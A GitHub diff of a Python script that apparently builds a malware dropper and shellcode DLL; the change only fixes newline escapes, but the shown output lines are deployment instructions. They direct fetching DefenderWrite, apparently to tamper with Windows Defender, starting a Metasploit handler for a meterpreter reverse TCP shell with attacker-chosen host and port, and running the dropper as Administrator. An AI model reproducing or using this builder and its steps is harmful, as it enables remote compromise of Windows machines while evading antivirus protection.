File tree Expand file tree Collapse file tree 1 file changed +6
-4
lines changed
Expand file tree Collapse file tree 1 file changed +6
-4
lines changed Original file line number Diff line number Diff line change @@ -248,20 +248,22 @@ def main():
248248 if os .path .exists (temp_file ):
249249 os .remove (temp_file )
250250
251- print (f"\\ n[+] BUILD SUCCESSFUL!\\ n" )
251+
252+
253+ print (f"\n [+] BUILD SUCCESSFUL!" )
252254 print (f"[+] Files created:" )
253255 print (f" - { exe_name } (Dropper)" )
254256 print (f" - { dll_name } (Shellcode DLL - { len (shellcode_bytes )} bytes)" )
255- print (f"\\ n[!] IMPORTANT: Download DefenderWrite.exe from GitHub\\ n " )
256- print (f"\\ n[+] DEPLOYMENT STEPS:\\ n " )
257+ print (f"\n [!] IMPORTANT: Download DefenderWrite.exe from GitHub" )
258+ print (f"\n [+] DEPLOYMENT STEPS:" )
257259 print (f" 1. Download DefenderWrite.exe from: https://github.com/TwoSevenOneT/DefenderWrite" )
258260 print (f" 2. On Windows VM, place these 3 files in SAME directory:" )
259261 print (f" - { exe_name } " )
260262 print (f" - { dll_name } " )
261263 print (f" - DefenderWrite.exe" )
262264 print (f" 3. Start listener: msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST { args .LHOST } ; set LPORT { args .LPORT } ; exploit'" )
263265 print (f" 4. Run { exe_name } as Administrator on Windows VM" )
264- print (f"\\ n[+] Debugging tips:\\ n " )
266+ print (f"\n [+] Debugging tips:" )
265267 print (f" - Check Windows Event Viewer for errors" )
266268 print (f" - Verify all 3 files are in the same directory" )
267269 print (f" - Run as Administrator" )
You can’t perform that action at this time.
0 commit comments